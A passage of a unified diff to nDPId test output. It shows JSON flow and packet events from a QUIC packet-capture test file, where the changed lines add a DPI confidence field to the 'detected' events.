 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1621495410048,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495410048,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFgVAAH4RX\/eokEAFgPgYAeZMAbsFTtl+yf8AAB0I\/leLTB44CRYANwAjTks9G8lrwt7+vZI0DaJowcQhxAH\/31dnEp\/wJDdcMs+96OC39JlFREj+x7uN8Y8I9xFEQ29E\/a6s8tYEG9mj1POKhRa4vw3FhUteagxK+Q3DYpMRbbQyi17yakV5fz21hd995vaP89QVSqNLp+aAiSc+XqrCI77QXUHLmsP3G+aV40nY4QYlAWTLcidClJxeZyPxcfdcTtSNYicTl2FhoQfgv\/izTkA8Ux332SxyJP9+2z+XN09eJbN3mFulwha40\/Pg2JJnk0Mm\/3T\/Ss1Ch6I\/57GVqncRgavCBlhRoSVFKd86cw4yV+Ach6\/lwZDc5hjr3\/nqPDyHyOk\/ic1VUkphYEW41unlD7wuiEsRixbz8q3byugh+YjmzBN4Tq47QChINSRWxj4L+BjNAoQ7Dai2X97Gz1ilrfn9+zsFqOwEj79WLqBpmtfOV849tRu3LnfZ5cuX\/MO2LG86yC\/6+pLC3ANUDv1RY2PC7sUP7d+2w6wZL9lz84eJ4EUxCxoGhaeWNioxpuXz6QtLrdpqY2rZZMA1WHZDaqTSa2btkRbvpzj3eovzOuknue\/RfsdTXXW3UMOpsc9ufpxUOiIdmQDlR9ngWJJOEe\/+zAdRs4VCI3jg3b+MFDhTwkUDRbn5RdNBFGIFGiXMmlzBNp8WabWafrmaKncF2rHZrecxeLVQ\/VSRUDmEKuHw40u+BNDILthR2FlUDDPJIVa+8K5xsZq0GxABXMcW8oZDwrq5xqDJZgYviq8SMcVntUHd4lVflGxbnfbnq3u\/Fk2Q\/Bs6qxzEdrCtn5KxNf5RTEOp58JUv2EOmrI1dyD87\/vOZYoRo4zjmc5dfyfUed+U6qOKm9QNfz5t+khBm6EE0js0KEb\/+Q6\/FDW5NzexjAFt74fp26YEUcjbbOPT98MLJKLLZsudFAxnHc8sILQ7K7ykQTsjx+T\/KOD3Enwwk1Vj7wEx2TRnVYzj9HBoyE1hYdqsP+4XG4c9\/T3CYr8iPwgA\/aTTnUnOQGVq12dFIPyHfSU0aW1473o2COwUVCD0ADVE218fKQZESyx3lIauVAb53dvU3\/wIawiFCz3acy7VEwSNGNM4p1UV+gN+HBUKUPzY8exwOAX4I27APon\/2ahebhkhpVTALzP5\/h7a9YZDH7+4j+sDYvJYLFK1kStX9AMMkrOXJtGqYpqgjUKCp2ykQVjHn\/RRRes+WwM6iqH92nVkHIv21SOZ8nVM86HIxmxEKln1LCCgKmw2iOSzvtfGSozM0d\/so3uqMQgMEaBugSKzaJiIYwVfVibAbpN0adGCr0odL4i5Z+yx0AuzsZ+EDcPN67poLOsf7GSYwLDiQkVusGkT9qI\/+26abOUxBiwO5qIu4c3OtO9Pl6FwYcO91fZh650fsDdAhxQSRml+yPU29m5YVwysjHTEwUlh7bDdMFpdQdpdmP+YBhsc0SG8HbyUGUWAXz9Q0pI6aQER6n+2b\/BjsFSwDoAdec89vuok0yzzVxihCQNqfDhwRMqvQlmf41fMjfoyQkvsYJMCbKU1y0ftuN2J8N7YcBgXEpkyZ73F9eUWeEUHAENs4C+x+znjGw\/xdKih19FGDi\/nhZNMlLhDpFyi82JaXj\/bLXeevjzdhjNvFrlWRduPD3Az3+Jt8O1Sm71ZcoDZgGY54gQ3OrsHryVHzWg9achFHZLn\/ZWA4PSjBQQH5WG6PFgfZhD+kj1oost9E1Z2g02u+oPqUAeEiw\/SGcRViFDskV2Cj6eFv\/nHh2vnTL8ODpgiQIs3IP3M"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495410048,"flow_last_seen":1621495410048,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495410048,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":58956,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495410048,"flow_last_seen":1621495410048,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495410048,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":58956,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -423,7 +423,7 @@
 00627{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495455961,"flow_last_seen":1621495455961,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":54449,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1621495455961,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495455961,"pkt":"AAAAAAAAAAEAaACzCABFAAVipjNAAH4RMkyokEAFZsLPs9SxAbsFTkz3yf8AAB0IW6VqPL9nKU0ANwBravUmWKq3yO8VZlOBqHgbki\/goI5n14Od4wyAZtlECAHCn0lzdaz8q7RFJaLaxg8bqaof4Y9E\/aCKkqi83SiSxj0wA9VaVnLuhoAUcP5pSIwdVZ226lDU\/fKJXCOWhj5U0vGsWctMBnACRJooqY\/EIe7zeS4gW9kRSye11BfEHBZvQCQ2Hw5tRRQO1ihfr3AH4BV+w18QXsSRjA3AgSLlWmVvNoGhvok75aqRHYiBSwdwNT9ZQk4cM6MThQObIM9OwmrZGYzdgcwWP\/FJvqDB39XhD+omQ8uC8mZ537oEh5AGXvor2yfynGKqmgp\/yT\/dH3topVKC+Ri4UD6+q6yMBizxV\/DHc+zcKb7bKMFFO1eiqXSiGPoIgEutHke5OqadU\/tLTj0WuUrML78PqgBRydLfJJ0hSojdqY\/HjdwJpZeFJwp7wKn8VRGG\/yvY2x6pil8wpOS6XvWHGvzNPxD6C+g5axKm9LfXWJkNn4V0vMRIJyOAoJsSgFe32K\/w60iIObURGr7LOTvgxY8kLZgGkxD8VmUWaxSsIipdY1zQzkND1VZO6t2zr\/a+Q8DohD1YPV6tlk6rn2prShAt77QE+pLlEwym1HnxiPCdcDtyW285Nk7kKruQ1mmAdcp7hpBdeQ73zBfPFm4kViXEkOmKqu2y8u2C\/dbP6WGDVgmEt50G\/TZ0SMJ\/1lXGfmrpbdAKoOxB7xEdy35+vcwsE1YFswDl5TGR+NBvTqNrjHDXACh8Cx53IWP59Ji2saD1Ye50T1Sx5LgA6SrpWbOlU9Rsgq\/TBSC1tQOH\/VmrKAut\/8nukuPoNtb1a5uUZ1c6bwAcpjf5TXN41pCYm69SI3nssNWo2dyLqOGKECefwPxQf15zCZ8qa6BPFMjjc5uFw2+UZJ6H9uVGcT6YOn9ATJjXV1rWnhxewQVVeqNiTOey+tQF+cjBBZLReI34HshIV8r1nlrST\/qXbWAKh7GeUQmJneZZhYb81MJMByTb73VBZXoZ6xGgTNyP\/dHOTR22ecj1LOs0qstF2wN9snIQZrrfX2JlF7dq2fFSKEshmXaVGCEL09hXFhHbq0QayKuLAWWI4aRof11r+CNpR\/NJ0Aqs+i4pRrJnNm6t4IC1bx4FGU7Nyx6ngu+TrgAfLdooE51VAlTUl0v7zV2KYm5RDSEpj7PgcRIvT7QAwBPfzFQ4j+lIz1HgE2KmRziUtymSXUNSNgt2udtGTPaV2DAgGZS6qazUIKNzkZIQp8q6s4lL6Pqeb5LG4kvEOeCmxo5wEofaOGvytEr8++Td9tOdy3u+6tQw8ZChKbNfJKWxhoOFUIA\/5YBmZFZSccanTHvVJto7VxFojeJZukeioQQjJDwBPHsywE3BtR7h6oz5boguk9Kou14u\/5g66uwMCuxQDPrXZcoTZsZa2HLwy2qe0ExuzZPw2HHvmOyZSAGQ+m\/BLcAwWVL927E2hs76eRGuJwqsY4GpvrOX1CbGRhwTxeliklR36iagwOV6ZLPHJGQ8sRMQ6E+CPifdBY0km0DQvehrT8ZiGdH6wl7zf3ONaN9EN6wUYANIeHCXhN9ihBg9GaQHoAfGloAC1v5PK1ylIeuftjWmCPhso3b9DRFisYli57JTJDMeFP014yikgmjmgpEmF7DxSG5Mv\/1+EFTtCib5OrXYmTEQm\/5mM09hj8zz\/HhlKsiMfbdKKTGX6XSTEBKV9L0IiOMNuHkh9x0VXilYm+QFUtpSkJC0TjJiw\/HyVRyGEOuTm4Ep5gOdRAcfPf\/R3xVB"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495455961,"flow_last_seen":1621495455961,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":54449,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495455961,"flow_last_seen":1621495455961,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":54449,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -436,111 +436,111 @@
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1621495692143,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495692143,"pkt":"AAAAAAAAAAEA4PSECABFAAViwhdAAH4RV5yokEAFXWSX3eu2AbsFTqlwy\/8AAB0IytRHE\/BcidkAAEU0GAJLgq5zWCEW\/\/vpneUqridEkoosXOYvPFM+EGFgFEn1\/pdK2U+fbOyyD9aMCeGUBOZnfvyIfNO5K6N10kJD2wSuJMaHeVG8mTehPz6Z7xoPc5LRNHFpJc9TdwBWwPbj8ekTbabDuVDHMstO8xpXRQySbhJHU6wlq+klfEbii+8EVostEJjHVEa1OZRyeAxcg1YEz+0PhQrslK4lhYtYjv4daqrQ9huOezEOwJKVIALQJLGoJ4f2F0eqzdy6jHFW4Shtit+AoF5iUPYyY6JmIGKfalz9t2vSbZumTgJ9SLPadk+rld6hE4IFunALh2k0HHlflWmsTcHH4jZndWLbu2r2iLUOBVoiQ18gEn8zCFncnoY4ExTQLd0WhsHz1w74Rs230gs\/qIzBbpiNnor68kH6+ahcqnABZBlXRVXYrQtqzWMVecwWgFBr8kmDHNSbEsffCTExI7CQu3mzEUOiFNDs51itYsXzdmE7wEGo\/bGYgZblzPEz8chYGofZflNVoia8KxZj\/VLWXLY06JYSw0TbdHU6OZKpIlgWKPSUU9yWUDPgULA8g0V45R6QNOWEv\/+Xd5aZdfeHnkBDVK8YnbuFxEkxeTLfnF0HSQd2toTv8gz1i8eq0knZewiX9Qyn6hzHgP2\/U+hh2ui9eIuBGqxzkvyg3DOjUT9WKjYnMvT3pNBH\/YoJtrPxSn7XrrXNYYWmNcxW4oxEIL7wiLLLL7liAYBvwS7FLIJepFUJ89bcXkCLsjkN63okoguLX+ND2ec7J9VukjZ+dXxDIqV16passDORQcQv+hP9S1RE1mHSFBJt3dWs3kSbeTxL0\/jUX9wUMKCAKJsmn1JHBtj3SRd+Cq7RST4KNBpNpp+OrN5GS8zmmRP02n0QZdRAA\/cP8cayAz44AqG8Nmgu6qpMXQlCEJbdSMX8zW66ZG3A\/wWBiO6fXKXtPqq0B+fcrDGzggFgJ7\/X1FeMde1oO1KvB7K5FnKUeH6z5iHps9E6+eItgN1w2M0OXrE++u9FVrWPH31W5YKQVZMpI0U7re5kVQMzV9bJRcBuHYng7XfhD8k8uOEA1mD8rAI2acFs1IU7+t6xL5xpLL17JhawgaF8\/SfwzgEFHaQcPkz8ipFK3FbfGt15dt4gZ2CzlxYp7RaoRsZiNmF1SVZhPHx7EKffzikgMDfyCfUTej4mHFjDSBXvSBw\/tLvSe9zKIGZzW4YW5Zx2kF14W03Knayi7As27e\/ETroLvHWX+zYXh8lsCjXblUbFLn4OvB4Vvl6g7osC7YpQr9UoDjSRAa6delKk\/ZUwvlsmVlVdxie6KoM9xa4Kzoe6ANfADEjk2L3bHvC3ibZLII1p03Itmuh1fVJvnQ4PqLPmYJ6J8fjwoTytcU64MeofEY0xuIazjFponK+zHprMee9E4a13UVbglxsx2ynEryvHU7P2C9n3y1sUu0MlUWwRaMb2msNlm84Pn7t+d7khBduwQHoE47sarcouiL95rGRzCh6s8NudLolgOYJuEw4uamdMOpSbqhTz6in40vyUrVIdNnXic83DBKdCA+7fAJyj\/qP2NwPP5wjaudyfPKQUIUm\/ZWQd3dL20quz7Lifs+ZxH7e5Z79ubipc8483Vd9Aq+ZDmCrdC8DTUvYkNu8HRlFIJ\/87x6kDCqBpz\/Y6oKJ9fnDWzu3vGVK4nDx4jhx0IvaEpB8u7iVohyPAjcPcqis5bb\/b2l141\/Mkd7YUfg1edYX7s7jeiJZNXtRq20b9JPjsbcD\/aEE7zAWRgf9W"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1621495911385,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495911385,"pkt":"AAAAAAAAAAEAS1QMCABFAAViZVRAAH4R9mOokEAFCUGp\/P6iAbsFTuJkwv8AAB0ISXF10ZCPcZ8ANwCrCJzLpozLw4lUkkdlAQ6gxDr15gnzrPDGY+5Es7Rj4OEug7GPyeqPD2P7ep04DtKE\/arcjWhE\/TeK9i4OFMtcnTbxJLT+Ie\/sDxN+8rr9EpWTbrHR6DrOgebE9CnNf9TmE3FgFzE1oavAS0XPwmTIIdH8DlasdxYKazZ2\/Vbz3SE0UaIlbXgmou7suHpa04zHS3u5e9ZyWoFTxGTtw4WSnPz3ZKKkluQDu\/BtGXK0Nw2vkZHZvHI5lbvjogi7BhIgmeQsuujAYnjK\/8JvDzTmbaLJnfI0BPAzgpLAyl5Uc2gG\/KhKxSiYKBAPLQlIw6PFn0Lw49hevbrWvRHOrE9CLjmKoraWxDJ\/mALo4XhOb\/38Fr\/hKdvS3J0EgxlCXTb2thu6vO6TuyRCkuufEdAjYJ1vuqyiJCtFCAuUx7f18Eb4YEnOwiDxAbC3vGkfxkILkOjo6zw0CLRXf8nS\/NGBDwLWigrT+llhvmIHUFzlv9UH+xnKwzw\/egOFElPuDQWAHnu+onEYr+xarKfPXzcUZ2mJ8x2qVU8DnquJVsvWPKVTkAEBNrppoG89a28TVbihC9GQZrxGFJfKiDfU\/pEjYGoEkpc0EmKP6WcJTrq8AjU9GqT8Otws\/2IJyr6eRQmrOEnR61BpA68BS2gZETtHAFeV+7SvjjISU7v1iOrwnLh5PVhV2I3Yg++07Mh3uzcKBBpCykABy4RIzFtFfD0mgpctccbji0EH0ftvDOPuyet7rGzNJxhlJE5822+Xl3TP9GlIFWuu44I+7Awm4hQYyx6SZMm5VkB1u+AQoAVC5yMuqM\/oqccmH3ov\/Y0J8XBnYLvKXGFZN6w2Ie6AwP0RMVPR4KQrpr7QbTjZ1gqRIH\/gSQZm2lG3NnFEcauzrfT+UAJCMrcsBthQQ4GFi4GLid84Wo3e01Yrsz68cR\/Dgyy9EjPbiFW4MTikaH6+JGXf6NLD1CBuUsZVLsd0wLuOp+mdcUObLIIhYByY+ZgC+pokGwX4+0M17gKxSBYArJDBxXe5y9O3GJkG2iDua1ffTw4GMCTWjg\/R2g3bNlRt2Kdpw0gNsexLTtD4vFIhhqYc5yzqubTAWDS97RiK0ff82cdVn+d1axfVYDUVVOuPm8ks3AoXLvMXz0uwOT1I7eZMtFaHeThWMFitpjMx4373HtevJV+R5JNzCQnbUkKMTjHvihPPw5JObhnamIan7J5a0S1j0TBlprZNVWcpdmTBKK9FiCYUebSphRa9ldAHRwzqCWNqZR\/NnSxOGm\/diizPFOGmgelkIA+7xLYtK7TLNkZ6WWwfmMdAfmJXz152dGSsptNpHU7WmssMjos9x0nJPItQNMAxpvgaTkatuyFUAnSEa\/kG2dwBsqrcrwjs\/mFLXB5BDHAaGdSx+C7zjjhFvObf79qhHZ7JrOH0IFeQgRTI\/I\/N1E\/wA3O\/VVPfi5T2WZv1WQoakLeMywD1DSZddBLRgEj9HiaWe\/6WOpSn\/V\/zM+Gime9loFOdLfGpXUiurZsHPqUL1b6MPeMrtR937yF4HPz5BY+\/tSnZ01u2ik8yu9Q5AJ4CmdPfTqD4sA\/UJgRLpffrp7JIFjyUbElKxtMBDr0WSdiYnf1+TQzqqaiOCpGsNMZoe9ogrQfFW7\/gdsykD2QZJgD7hTY\/mVqzcE88T3Zcf5TxTTDINI4atIY1lYydToKknzxOdKjXEcoGNF2fxUyQPRMk\/YqD0njsh1Dp+iMP\/G3eoOFqy1\/r1bbUJxo+NSb1V8JoUh0VwlVF0mFL"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
